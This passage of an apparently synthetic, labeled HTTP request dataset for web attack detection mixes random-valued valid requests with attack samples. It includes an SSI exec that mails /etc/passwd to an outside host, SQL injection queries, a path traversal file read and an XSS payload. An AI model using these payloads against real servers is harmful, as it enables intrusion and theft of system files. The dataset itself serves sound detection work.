~~~~~: ~~~~~~~~~~~~~~~~~~~

gbibnRqrendx8a=n(https4&C0aFXTinputDZ6=4413701

End - Id: 7691
Start - Id: 20310
class: Valid
GET /lzAdI4xVXCB5onl/wIX61khi_DgFh8@mjOHu/9ryWiNZdRpMT1P./d6coatfted.nsf?LuGPONwhereylCSP=7637&yy=h+ePqCqdn&Fdayes75iG=328&50me=+ni1locationb&iesrisaGoa5i=0ies&adigif2j2SkTwgp=604090337&orzh=lys- HTTP/1.0
Host: www.tefu.biz
Connection: keep-alive
Accept: text/*;q=0.6, video/mpeg;q=0.8, audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.4, deflate;q=0.6, deflate;q=0.3, identity
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 235.128.217.246
Cookie: QMimBKnmc=oig ;ankrCxsat=hQPpn;emseKteagtro6=saj e6inyacobodyY1usey
Cookie2: $Version="6"
Date: Mon, 15 Sep 08 18:23:27 UTC
ETag: W/"xm5LAqgpeyoj-TKblS"
Expect: 100-continue
From: ss7chat@0nncgbi.fr
If-Modified-Since: Tue, 28 Sep 04 19:29:23 GMT
If-Unmodified-Since: Thu, 04 Jan 07 06:38:15 GMT
If-Match: "89i9Q5xhJR.7pI2s8-rt"
If-None-Match: "O.WIFfO3oGr2TJEk6"
If-Range: *
Max-Forwards: 8
MIME-Version: 1.1
Pragma: exe='izuont'
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM czJEcE9Yb3VsZDBzbW5laWxIM2d0bjhycmhpdGFhYWhsczBvbk1ldA==
Range: -755,8352-
Referer: http://www.tqnt9nho.be/vyte/rreihjAo/Ha5r/eefBz/mf0Fcu.php
TE: deflate;q=0.2,deflate;q=0.4
Trailer: Upgrade
User-Agent: hfwBsse9
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 608x215
Via: rfDtS/9.8 www.nyjcT.shtml
Transfer-Encoding: deflate
Upgrade: tsen/7.5, oodl/0.1
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20310
Start - Id: 21146
class: Valid
GET /kQ0/easaXq0Y05B1Aj2nMGO5/n8.php? HTTP/1.0
Host: www.nLtn.it:9349
Connection: ew2Rr3e
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, gzip
Accept-Language: 2rny-i, lm-ebi8e4ac
Cache-Control: no-store
Client-ip: 148.220.182.133
Cookie: nfythrnrus=ramns+;OBWZAfggcC=tmot>Nog;nherl=NisaGlHdshtqpdlct;ice0=ohze
Cookie2: $Version="985"
Date: Sun, 06 May 07 15:11:33 UTC
ETag: W/"V7@GTDdaB7rsPGeEL7i"
Expect: 24t25O
From: dhehtais@ahehpggov.uk
If-Modified-Since: Tue, 31 Mar 09 03:31:20 UTC
If-Unmodified-Since: Mon, 05 Oct 09 11:16:25 CET
If-Match: *
If-None-Match: *
If-Range: "_ytj_sZouzZPbdV5"
Max-Forwards: 83
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: spnetr snSiU=Eaaulsc
Authorization: erihn trsl=nt6u
Range: 1175-,-288
Referer: http://www.oLnrtpI.uk/t2tnzaur/olao/atn4sv/Airf.jpeg
TE: trailers,deflate
Trailer: Connection
User-Agent: tstbotla (se3eY@Y; a5XDeN)
UA-CPU: StrongARM
UA-Disp: 3826,0274,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: 8.3 www.aeesdL.js
Transfer-Encoding: gzip
Upgrade: olhOla/3.4, eiCcnJ/2.6, t0pcs/1.5, eshn/2.6
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 121.247.72.172
X-Serial-Number: 9779680
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21146
Start - Id: 8521
class: Valid
GET /SktoC0KP2iPforS/6FMmHbscriptS/JMRctarre/u@H03fgyaP7o5T/PTR3I/csms6o44utotia.jpg?KTqhQrIPD=54059&hUN.ox-y7formy=gs8nItnoakrakr&34FlibEUCj0ho=fromEA1b&blrlfohate4A5=lOln&eegsr=-l&bmcdT=Hs5m4j&pebsjAotoftu=6&s7aqRdbttbuto=+%2Bh8&tptzrLR6ehtrrf=oe1gaUdu HTTP/1.1
Host: 199.249.208.120
Connection: epai
Accept: image/gif;q=0.4, application/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 255.161.121.240
Cookie: ent=99;rtsaItat=89
Cookie2: $Version="3"
Date: Wed, 10 Aug 05 23:32:38 UTC
ETag: "VYwYeqQX2hURZNlJJfS3"
Expect: slYre
From: s8eite@bed998ce.de
If-Modified-Since: Tue, 11 Jul 06 20:29:54 CET
If-Unmodified-Since: Fri, 02 Apr 10 03:34:43 CET
If-Match: *
If-None-Match: *
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 9909
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: Basic aGhodDpvZWl1
Range: 288-033,80242-026
Referer: http://pseknm.ch/3qeo/xhexs/wwrnft2t.shtml
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/9.1 (X11; U; Unix 6.0; he-tt; rv:2.1.8) Gecko/93954489
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 108x957
Via: FTP/1.4 30.111.168.67:320, 1.8 117.190.220.205
Transfer-Encoding: deflate
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8521
Start - Id: 44911
class: PathTransversal
GET /eQzjLNj-Mr09tYGe55V/weih/a@4a_XTH7Vpoe/eEfkw/ldytegi/nc/slhleomTkeehacrn/enzG3dkvDtnL.msf?agnNdt1entcaH5=51635497&.GeLxbXXhttpsLv6=8235461&tolotr6iiwem=doc%28++file%3A%2F%2F%2Fc%3A%2Frmmr%2Fan8n.xml+++%29&hsRt=0aaEEyvbscriptWd%7E%5D0xmlbhttpoph%2B&tftv=en7A HTTP/1.1
Host: 37.19.81.58:80
Connection: keep-alive
Accept: video/*;q=0.8
Accept-Charset: us-ascii;q=0.4, windows-1251;q=0.8, euc-tw;q=0.0, isiri-3342;q=0.7
Accept-Encoding: gzip;q=0.9, compress, gzip;q=0.0
Accept-Language: rM-Htre5Dh;q=0.2, rotkt8f-t, eAtn-svA;q=0.0
Cache-Control: max-age=6001
Client-ip: 117.77.195.37
Cookie: onwbdas=7si;a5tau=amttqeceka3ahc;Ueai7in=37548;myeWcpse4=shEg Dh
Cookie2: $Version="2"
Date: Thu, 01 Apr 04 13:19:58 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sat, 17 Apr 04 24:24:40 CET
If-Unmodified-Since: Thu, 07 Oct 04 24:22:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1227
MIME-Version: 7.3
Pragma: evnada=rudRZtve
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: /Cca6jen/0eecnH/uOstlcla/rreqN.msf
TE: trailers,gzip;q=0.5
Trailer: Range
User-Agent: Mozilla/5.5 (compatible; Konqueror/5.6; Windows NT; hslei; lnmehHeMn; xOemee)
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 2.3 101.92.144.176:5, FTP/8.7 5.151.204.9, 6.7 73.104.9.237:8
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44911
Start - Id: 7058
class: Valid
POST /ftelnetformoRzA0YK5p/2FcopySUhcNRlikeQtXV/U8.nsf? HTTP/1.0
Content-Length: 18
Content-Language: TweueatM,nr7oJsmt,gnEt
Content-Encoding: compress
Content-Location: /Apsiias/rentoi/hwootip/ladE08a/wcel3a.pdf
Content-MD5: b0p6aWVGc2F1Nm5lbG9kbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Jun 04 13:50:35 CET
Last-Modified: Mon, 13 Nov 06 01:05:18 CET
Host: www.jkyoeeyw.uk
Connection: keep-alive
Accept: video/mpeg;q=0.1, video/quicktime, image/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.0, compress;q=0.8
Accept-Language: evxdwty-Nti
Cache-Control: min-fresh=367
Client-ip: 132.198.29.0
Cookie: rnt=832
Cookie2: $Version="4"
Date: Sat, 09 Oct 04 02:07:03 CET
ETag: W/"zqSNf80KOhG4_gtigkN"
Expect: Ol2jw
From: meebonii@Etgu.be
If-Modified-Since: Mon, 04 Feb 08 20:11:50 GMT
If-Unmodified-Since: Sat, 02 Apr 05 11:14:09 GMT
If-Match: *
If-None-Match: "fYtzWEDwTreZwMoPeL"
If-Range: *
Max-Forwards: 2
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: av6on gevp5=fEhrwh
Authorization: NTLM b2thdHRtanVlZVhjUzk2dWVwbXNlb2VlMWhlb2F1aW5FaXQ=
Range: 51061-93,46103-3,-27
Referer: http://l0xtoy.com/dowooowt.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.6 (compatible; Konqueror/1.6; Solaris; eqtStna; QtztoalEi)
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: nmsco/8.1 www.etEir.png:3183, 1.1 24.241.240.169, 3.6 86.156.255.56
Transfer-Encoding: deflate
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 243.127.72.185
X-Serial-Number: 484018235309
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

reRmeMdef=bpueCzly

End - Id: 7058
Start - Id: 40178
class: SSI
GET /78ge4jn5/aYWwD/OFG.htm?axezayeuaoiim=688267&Bl9insertp=vwinnt%29ee7ae&F2H2iehTqiratr=u%3Ednrokiedd&rud2lon=093686&yFd2QO=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fmail+++++2o.com++++%3C+%2Fetc%2Fpasswd%22--%3E&8shopwao=k_LyxFONz&Srs7=wp6UKeDr&r7yedcsosrtCnsn=45&exttnti=987950&om0e=1 HTTP/1.1
Host: 21.69.45.191
Connection: itnio
Accept: */*;q=0.7
Accept-Charset: koi8-r;q=0.8, euc-tw
Accept-Encoding: *;q=0.9
Accept-Language: r-a;q=0.2, tIi-cai2or;q=0.9, ibe-eepdmsq;q=0.4
Cache-Control: no-store
Client-ip: 34.79.0.86
Cookie: hizymunegt=0ooc;nfnrfnte6in=ec o+sn;j4TreplaceZac=wcfoeanoststet;nr=9NoorLyieiede626n
Cookie2: $Version="41"
Date: Wed, 08 Feb 06 19:41:27 CET
ETag: W/"7_fIJgUkcj3qP0p_CXHG"
Expect: 100-continue
From: 1unwdb@arcbteiHd.biz
If-Modified-Since: Wed, 18 Jan 06 15:54:55 CET
If-Unmodified-Since: Wed, 19 Sep 07 08:54:41 CET
If-Match: *
If-None-Match: "oZJZEsX6xh.d@@e@2S"
If-Range: "z4J7VHohIk5@gnw3OaI_"
Max-Forwards: 6
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: kssrfm qtVe=4Ewoa
Authorization: 9th2s tltp1s=aRtTiw
Range: 0-
Referer: /csHaxoho.msf
TE: deflate;q=0.5,trailers,trailers
Trailer: Warning
User-Agent: eaTI/1.1
UA-CPU: StrongARM
UA-Disp: 6994,159,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 867x201
Via: HTTP/4.4 252.186.242.155:0
Transfer-Encoding: omdu; etnup=hqae4
Upgrade: moke/1.6, hxef/0.0, hp0ky/1.9, nstdo/7.4, smon/0.7
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 134.80.112.39
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40178
Start - Id: 31021
class: Valid
GET /-Ud6XHrVy/9B9mYhUyFFMWC/dJblQAlU/eeDdenmhtnmie/nN/gmVihV.PB33SN@/ert/ee5n/eiKXdl0/cNtTTf@a/M0HLdwJBXLA9optB/s_hRu.msf?atl=91283&PKKiupdateC.8m=277884&Fssnibyketi=asnprocessing-instruction1rtenyCes&mnboftc5yrs=group+byn+lrmy%28%27e&oociu=h4tx9e+ryd&6a6Jareieaoo=o2e&1nGvY_link=3&qnsg=aDe HTTP/1.1
Host: 223.53.47.212:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1254;q=0.8, windows-874, ks_c_5601-1987;q=0.9
Accept-Encoding: gzip
Accept-Language: trum-os, 8pii-o2ioofh;q=0.3, o6mtray-bssi;q=0.0, mj-coeo, Ksi-oyinaed;q=0.9
Cache-Control: max-stale=1823
Client-ip: 154.71.85.33
Cookie: e2rr0hr=iioeTehm;i76=tnsystemOTw;2rcppV5R7=cWcsxml;sadpica1uIe=oesoeydoexprhwHlsh;hr=41320333;I6wifirsd=303815
Cookie2: $Version="98"
Date: Fri, 06 Jul 07 20:56:21 GMT
ETag: W/"3UcaAjaeWeHVa3QgvT@"
Expect: s3NdRsp
From: iqyoom@ptIe99oiss.be
If-Modified-Since: Mon, 27 Feb 06 19:03:51 GMT
If-Unmodified-Since: Thu, 01 Dec 05 16:34:28 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8591
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="VltR"
Authorization: NTLM bnBzb2Vlb28yamRhU0FpbHVzdGVvYzllVUVpYjl0aHM0bGVvZXRuZThzaWx1ZQ==
Range: 934-,-0411,903-198
Referer: http://aerz.com/duEh/rhi0vM/ims8n/oecze.dll
TE: trailers
Trailer: Expect
User-Agent: antan/0.1.8
UA-CPU: MIPS
UA-Disp: 584,4814,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8381x468
Via: FTP/3.5 www.iut2q5eu.css
Transfer-Encoding: identity
Upgrade: lkT/4.2, nRs4h/2.7
Warning: 016 www.mhuoal.css "jereaoe7fArebseet" 
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 827318624572609
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31021
Start - Id: 42490
class: SqlInjection
GET /7oeiuisphtlk/ictobtrOl6/ode/llImQIEOZk0mcVOzw/2stdsntfslibrmrpgD/eKtY8.yzp.kREn_fr/gBXQ5.swf?aeTed5udwsee=oc86&eitybnihn=Pnwat3t4dhl2hs&eAaEsuEyHF=9&eaenentgpIfyzo=812262&Aserltuav=%27+++%29+UNION+ALL++++SELECT++163+FROM+++Ngrez++WHERE+%28++%27%27++++%3D++%27&wn=nRvhhsbihLtD&rrnhtyuihmyfm7b=%3Cike+9rbmt HTTP/1.0
Host: www.ailwiwpisn.st:80
Connection: dads
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: ob-hf4Gp;q=0.0, dor5nh-1Naehiox, ra-oi;q=0.1, s-r;q=0.0
Cache-Control: no-cache
Client-ip: 215.176.56.170
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Tue, 07 Dec 04 20:11:51 GMT
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Tue, 12 Sep 06 23:14:11 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: "iwq@3s2mgcWRUKiF0P0R"
If-Range: *
Max-Forwards: 148
MIME-Version: 8.5
Pragma: em=eqCs
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: NTLM a2U3Zmk2dGVrT1RybURzMGVuTXN6Z2RuT2loc2Vuc2V1bWVzY3BpYmtycw==
Range: 7-59040
Referer: http://eeise.cz/dcNfy/eIetlap/caDu.js
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: uSrhntgteeijoq
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 4.3 70.53.26.31, 1.6 www.mya0re.png, HTTP/1.6 www.dapohr6t.jpg
Transfer-Encoding: identity
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 682 9.47.244.88 "t7gglstsHoti" "Mon, 21 Jan 08 24:54:57 UTC"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42490
Start - Id: 41917
class: SqlInjection
GET /ytrtPtcl/pgiandaREtelnetUsQIs/s7rrwIerhl1muDpbo7lp/cBq8WZxTtxCvtSrK@/iZanSk1Sch_o/2o/DkGrl.png?ucReanoi81s0b=arew0w9amtpm&yk0fmgmpvnl=dE+a&ierwco8=nmC9hkY-&kd=%27+++or+++id+++++in++%28++select+*++++from+++++++user_db++++%29&i9rhnlatoyaE=s88neubna7QmaahAwl&61lii=25&inne=32329325&eelttoenjitsu=msuhsyoe&ew2johj=57011 HTTP/1.1
Host: www.uaao6tct.fr:84711
Connection: keep-alive
Accept: text/*, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.6, deflate, identity;q=0.7
Accept-Language: tumogycl-ts8sn;q=0.2, Wtjses3-f;q=0.1, En-h6rsawtN;q=0.4, eHptmpi-n089eT
Cache-Control: only-if-cached
Client-ip: 21.123.50.241
Cookie: pshtlhcpanaqii=vft
Cookie2: $Version="8"
Date: Tue, 11 Dec 07 16:27:10 UTC
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: PtDlsore@tsfosgnuwd.be
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 049
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=tfau
Authorization: Digest realm
Range: -0
Referer: http://www.lda2.org/poanas/eennn/Hs00esm.asmx
TE: gzip;q=0.1,trailers
Trailer: Via
User-Agent: nadurnnsms (wzesgukC; rjzzCtNj; cpTknATBxF)
UA-CPU: Sparc
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: ncsa/7.4 119.155.181.203, HTTP/2.4 11.194.61.13, c3Lu/3.5 www.aaeifd.css:5
Transfer-Encoding: deflate
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41917
Start - Id: 816
class: Valid
GET /CnFI/ca2swhtnrfahn/e_E@SayD_mooAaWeF_b/lo/idehwau/a1frzqbiorsas/Pce4siheseDnthn/nr.png?teriewwrae=ek%40L4nun&uji=sEdropg&dxmonytwe4jat=nph-n8iitsdsteusrns&E9ald=924285371&eeNfskhms=rF5B1KjdZ&ra=osIs&khtftsrnye=710145388&yltdeEnotAumk=anoewennU2wrii&4ooero=7 HTTP/1.1
Host: 243.112.101.33:49333
Connection: avcri
Accept: */*
Accept-Charset: iso-2022-kr
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 97.242.61.48
Cookie: eencnuda=ReevalE@L< services Tccmd;IdvBytS6M=8714;patiki8x=e;nsyirfeDoiire=857093712;esiasrje2=3693061
Cookie2: $Version="0"
Date: Sun, 25 Mar 07 01:52:05 UTC
ETag: "p0LNSbZTLL2tygrWD"
Expect: nl9d
From: otea@mcanstwra.de
If-Modified-Since: Thu, 31 Aug 06 09:03:38 UTC
If-Unmodified-Since: Tue, 03 Feb 09 16:59:29 CET
If-Match: "Fmzyyq8KZklVJ3KS"
If-None-Match: "975X@XZnhH.PhliNP8xT"
If-Range: Mon, 05 Feb 07 14:10:46 CET
Max-Forwards: 02
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM czY0bW9zY3NlZ29wbXB0enRkZVJnYnNYbUtpMGlzbnZu
Authorization: Digest username="y5ce"
Range: -5014,811909-578591
Referer: http://2urGihri.uk/Uoas5om.rar
TE: gzip;q=0.4,trailers
Trailer: If-Match
User-Agent: tAtdcrS (sGp6Mx)
UA-CPU: MIPS
UA-Disp: 764,3407,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9683x567
Via: tr9ar0/5.8 www.rsb9.js, 9aajip/7.6 138.231.90.172:38422, 6.3 www.wdeel.jpg
Transfer-Encoding: gzip
Upgrade: 5do/3.7, s6EEao/4.9, trako/1.5, iciSuo/9.5
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 816
Start - Id: 10051
class: Valid
GET /i37jgK/y7_/36bia8ttCnuftrma/eaEjt/eMjCuoj7qEARmon/hg0epBareEhEattodo/iKpea4aexoirpe4.png? HTTP/1.0
Host: 196.206.218.68
Connection: keep-alive
Accept: application/*, image/*, text/plain
Accept-Charset: koi8-r, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 158.72.32.47
Cookie: swhn4wnlni=4udIpYW0n;odtintahkraeoes=e_pjSUX6Ej@Z;cmtren5enyc4a=re ;7ee=7;mnr=1m5it ;dk;02= iframelarhoE
Cookie2: $Version="32"
Date: Thu, 17 Sep 09 09:03:24 GMT
ETag: ".Yn2aH-29DbWpQul990"
Expect: foPtnd
From: eh9tyRo@etgs.it
If-Modified-Since: Tue, 23 May 06 19:09:19 GMT
If-Unmodified-Since: Wed, 25 Feb 04 20:46:02 GMT
If-Match: *
If-None-Match: *
If-Range: "sEG0_tk.MVKkrbytKXx"
Max-Forwards: 9073
MIME-Version: 2.9
Pragma: qtnd='Eantpsd'
Proxy-Authorization: Digest cnonce="ofgrete"
Authorization: Basic ZHN0YWV0YUU6aWRkcmFkbA==
Range: 5088-917
Referer: /neenyT.aspx
TE: gzip,trailers,chunked
Trailer: User-Agent
User-Agent: j_nRty http://www.xtse.ch
UA-CPU: 68000
UA-Disp: 0894,529,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1796x089
Via: 0.1 233.199.73.216:63
Transfer-Encoding: deflate
Upgrade: odhn/5.9, rOmU/0.6, etCeis/4.4, iottop/5.2, scqrL/2.8
Warning: 679 229.9.169.36 "1f3pe57tT0edirwr4" "Sat, 30 Jun 07 06:21:13 UTC"
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 905480693565962672
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10051
Start - Id: 32895
class: Valid
POST /mrowd/hQz/OXMbVE6I@fX/hjees3inege/8X8OzB7uAqW-6U.cfm? HTTP/1.1
Content-Length: 247
Content-Language: v3t,snSlhc,xdho
Content-Encoding: identity
Content-Location: http://luor.net/aomZu2.css
Content-MD5: ZXBvY29laGZ1YTJ0aWx0Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 14:42:06 GMT
Last-Modified: Mon, 08 May 06 04:02:28 UTC
Host: www.jdoorc.com
Connection: close
Accept: image/png, image/*;q=0.1
Accept-Charset: iso-8859-8-i, euc-tw, isiri-3342, cp-932
Accept-Encoding: *;q=0.4
Accept-Language: eiiNc-sS, Se-am7j;q=0.3, 3-45slioKm;q=0.9, CLers-onostr
Cache-Control: no-cache
Client-ip: 223.203.207.16
Cookie: utrM0emh=:netcat-[9trbym-;tzi4ritAri=274
Cookie2: $Version="627"
Date: Wed, 16 Jul 08 17:17:56 UTC
ETag: "1UmVFxzuxmLpl7L.dksv"
Expect: pnte
From: Aecihs@arog1.org
If-Modified-Since: Mon, 10 Mar 08 03:28:59 CET
If-Unmodified-Since: Sun, 01 Jun 08 20:24:26 UTC
If-Match: "0-jctt-81tSWWpG@xq72"
If-None-Match: *
If-Range: Wed, 25 May 05 15:32:37 CET
Max-Forwards: 1
MIME-Version: 4.5
Pragma: gm='nhr'
Proxy-Authorization: Basic TklvdmI6bzFkYWE=
Authorization: NTLM ZTZ0S1JhYkFuZWVmaXdoMGFvaTh1YnllY3dpdVUzc1JhdA==
Range: -11
Referer: /lnzt/8tsd/dk7oC/aityse/oYw2En.cfm
TE: trailers,gzip,gzip;q=0.7
Trailer: If-Match
User-Agent: nrsnlse1 (q4GKkeDur; rJFTO.uqBi; nCqmlKZY)
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: FTP/8.3 4.32.19.4, 8.8 20.165.37.110, 1.0 0.136.30.122
Transfer-Encoding: gzip
Upgrade: nttueo/5.8, iHertn/7.7, edu/1.0
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 5090057683068397581
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cd6kukdhyu=i0mawider8&nellseiws=93137&5ohitshe6e=tCyuivfhj2hSo&iSxqdiEtshviV63=23&BKVdKYL=huro&ia=fdg&cer=6damrr7&4lny=  objectooninr3aee Dsam&W5oKOp=9&xoey=524069&aonmNvonePhtI=i6Pw&ehtua=&NosrtRa&imgQq9v-=rSMebtwesu&vmtmoe=nlenh2unyz36&m2=eT8h

End - Id: 32895
Start - Id: 30914
class: Valid
GET /l36.cfm? HTTP/1.0
Host: www.iae3laenm.de
Connection: close
Accept: image/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.12.184.195
Cookie: atcmf=4578;trhepglgpk5e=0684;nu=oasnanUoj
Cookie2: $Version="325"
Date: Tue, 22 Jul 08 21:17:23 UTC
ETag: "e05Egf3UopcwH1RI8"
Expect: 100-continue
From: O35r@NAzet.cz
If-Modified-Since: Tue, 27 Jul 04 04:19:37 UTC
If-Unmodified-Since: Mon, 19 Sep 05 04:47:29 GMT
If-Match: "zkQMtf08nT9_CYL-"
If-None-Match: "klqsX.4M36dY6Qg3m"
If-Range: "euzalFh@qJVl3l5"
Max-Forwards: 281
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest response="f67048dCe4247596B7aAb3BFcCEF5eD9"
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 7-19547,727449-
Referer: /ienehEle/snfepesz/hsWSie/diBn/Aentea.jpeg
TE: chunked;q=0.5,chunked,deflate
Trailer: Proxy-Authorization
User-Agent: 52nomjn (b@eukGmaDq; enI1s@FPpg; vjPnL9AsnE)
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: vcu/1.9 www.meizr.shtml:54, FTP/6.7 www.ayios.html, FTP/4.8 www.jl3xddea.htm
Transfer-Encoding: deflate
Upgrade: ru3a/6.6, gtg/5.4, ich7fe/8.7, yar7r/9.3
Warning: 364 www.n0ehr.css:691 "oEieijPwonreuaI" "Thu, 15 May 08 10:24:17 UTC"
X-Forwarded-For: 59.233.149.239
X-Serial-Number: 535265474092814212
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30914
Start - Id: 47969
class: XSS
GET /wWl.JenRjescG@MWkd/eSbTngjTukhGvIz.daZ/6a2s9anntutrcjnxo/eattaefsausEetepdAc/Ay.pl?aE8een=%3Cimg++++dynsrc++%3D%22++javascript%3A+++%5Balert++++%28%27rehep9iq%27%29%3B%5D++%22++%3E&bgsoundPvpeQXWtelnetzG=07&gsi2enuh8n4eue=odeuohtln&zm6ntAtzuw=s%3Dayfp8oc%25u&0teO=enbsm&n8Inta=xostmpm&tassocvlf9kaSg=97&b8Eimftowm2eso=1375945099 HTTP/1.0
Host: www.tb04zh.com
Connection: 2cs9gbnR
Accept: audio/x-wav;q=0.1, image/jpeg;q=0.4
Accept-Charset: gb2312;q=0.7, x-mac-arabic;q=0.8, windows-1253;q=0.3
Accept-Encoding: 
